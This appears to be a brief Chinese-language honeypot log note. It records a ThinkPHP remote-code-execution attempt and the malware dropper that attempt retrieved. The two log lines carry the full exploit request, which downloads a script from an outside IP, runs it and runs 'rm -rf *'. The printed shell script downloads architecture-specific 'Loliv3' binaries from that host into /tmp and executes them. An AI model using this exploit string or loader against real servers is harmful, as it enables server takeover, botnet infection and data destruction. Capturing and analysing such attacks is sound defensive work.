蜜罐捕获攻击
212.237.14.55 - - [22/Dec/2018:13:17:50 +0800] "GET /public/index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://142.93.197.215/sh;%20chmod%20777%20sh;%20./sh;%20rm%20-rf%20* HTTP/1.1" 404 162 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64"
212.237.14.55 - - [22/Dec/2018:17:59:48 +0800] "GET /public/index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://142.93.197.215/php;chmod%20777%20php;./php;rm%20-rf%20* HTTP/1.1" 404 162 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64"
利用RCE获取远程服务器文件:
http://142.93.197.215/php
binarys="mips mpsl arm arm5 arm6 arm7 sh4 ppc x86 arc"
server_ip="142.93.197.215"
binname="Loliv3"
execname="LoliSecHoe"
for arch in $binarys
do
cd /tmp
wget http://$server_ip/$binname.$arch -O $execname
chmod 777 $execname
./$execname Think.php
rm -rf $execname
done
写入并执行
Loliv3.arc
Loliv3.arm
Loliv3.arm5
Loliv3.arm6
Loliv3.arm7
Loliv3.mips
Loliv3.mpsl
Loliv3.ppc
Loliv3.sh4
Loliv3.x86
php
连接Think.php